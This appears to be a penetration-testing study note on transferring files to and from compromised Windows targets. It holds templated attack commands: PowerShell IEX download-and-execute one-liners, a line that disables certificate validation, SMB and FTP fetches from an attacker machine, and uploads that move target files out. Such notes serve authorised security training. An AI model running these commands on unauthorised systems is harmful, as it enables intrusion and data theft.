File Transfers (Continue Here)

  • In penetration testing, you will usually need to transfer files to your targets. For example, you might exploit a target and need to upload a script to check for vulnerabilities in the system.

  • Since there are usually restrictions in place, you need to know different techniques. If one technique doesn't work, you can try another or even combine or chain different techniques to bypass the controls of the targets.

Windows File Transfer Methods

Downloading

PowerShell Base64 Encode & Decode

  • In this technique, you encode the file into base64 and then decode it on the target system. This technique doesn't require an internet connection and can be done through a terminal connection. Aditionally, you can optionally use hashing to check for the integrity of the file.

  • The drawbacks of this technique are that the Windows command line has a character limit (8,191), so if the file's base64 is larger than the limit, this technique will not work. Also, sometimes a web shell may error if large strings are sent.

  • The process:

#On Your Mahcine:
#Optionally get the hash to compare it after transferring.
md5sum <File-Name> 

#Copy this base64 value from the terminal.
cat <File-Name> |base64 -w 0;echo 

#On Target Machine (Powershell):
#Decode and write the file to the path.
[IO.File]::WriteAllBytes("", [Convert]::FromBase64String("<Base64-Code"))

#Optionally compare the hash to the computed hash before transfer.
Get-FileHash <Output-File-Path> -Algorithm md5

PowerShell Web Downloads

  • In any version of PowerShell, the System.Net.WebClient class can be used to download a file over HTTP, HTTPS or FTP.

  • Commands:

#On Target Machine (Powershell):
(New-Object Net.WebClient).DownloadFile('','')

#Similar to the one above just Async download.
New-Object Net.WebClient).DownloadFileAsync('<File-URL>','<Output-File-Path>')

#For fileless attacks, takes string and run it in the moemory directly.
IEX (New-Object Net.WebClient).DownloadString('')

#Similar to the one shown above just pipelined instead of run directly (Basicaly no difference)
(New-Object Net.WebClient).DownloadString('<String>') | IEX

#Works only for PowerShell V3+
 <File-URL> -OutFile

Common Error with PowerShell:

  • If Edge first-launch configuration wasn't completed then the download process will be prevented. This can be bypassed by using the flag -UseBasicParsing

  • Another error related to SSL/TLS happens when the certificate isn't trusted. This can by bypassed by using running this command.

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

SMB Downloads

  • The Server Message Block protocol (SMB protocol) that runs on port TCP/445 is a protocol that allows users to transfer files to and from remote servers.

  • The Process:

#First we need to create an SMB server on our machine.
sudo impacket-smbserver share -smb2support 

#Download files from the target machines
copy \\\share\

#Sometimes you might get this error:
You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.

#To Bypass this error we can set a username and password

#To set username and password, on our mahcine
sudo impacket-smbserver share -smb2support <Share-Path> -user <Username> -password <Password>

#On target machine
#Mount the share
net use n: \\<Our-Machine-IP-Address>\share /user:<Username> <Password>

#Then downlaod the file
copy n:\<File-Name>

#If you get the error while copying, you can try and mount the share.

FTP Downloads

  • Another way to transfer files is using FTP (File Transfer Protocol), which use port TCP/21 and TCP/20.

#We can run the server using python's pyftpdlib library. To install it:
sudo pip3 install pyftpdlib

#To start the server:
sudo python3 -m pyftpdlib --port 21

#Download from the target's powershell
(New-Object Net.WebClient).DownloadFile('ftp://<Our-IP>/', '')

#Sometimes we don't have an interactive shell. In this case, we can create a command file. Example:
echo open <Our-IP> > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo GET <File-Name> >> ftpcommand.txt
echo bye >> ftpcommand.txt

#Run the command file.
ftp -v -n -s:ftpcommand.txt

Uploading

  • To upload we can use the same techniques just reversed.

PowerShell Base64 Encode & Decode

#On Target Mahcine (Powershell):
#Optionally get the hash to compare it after transferring.
Get-FileHash "" -Algorithm MD5 | select Hash

#Copy this base64 value from the terminal.
[Convert]::ToBase64String((Get-Content -path "<File-Name>" -Encoding byte))

#On Our Machine
echo <Base-64-Code> | base64 -d > 

#Optionally compare the hash to the computed hash before transfer.
md5sum <Output-File>

Powershell Web Uploads

  • PowerShell doesn't have a built-in function for upload operations, but we can use Invoke-WebRequest or Invoke-RestMethod to build our upload function.

#Install uploadserver library. 
pip3 install uploadserver

#Run the server
python3 -m uploadserver

#Use script to upload files
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri http://<Our-Server-IP>:<Our-Server-Port>/upload -File

PreviousVulnerability ScanningNextUsing the Metasploit Framework

Last updated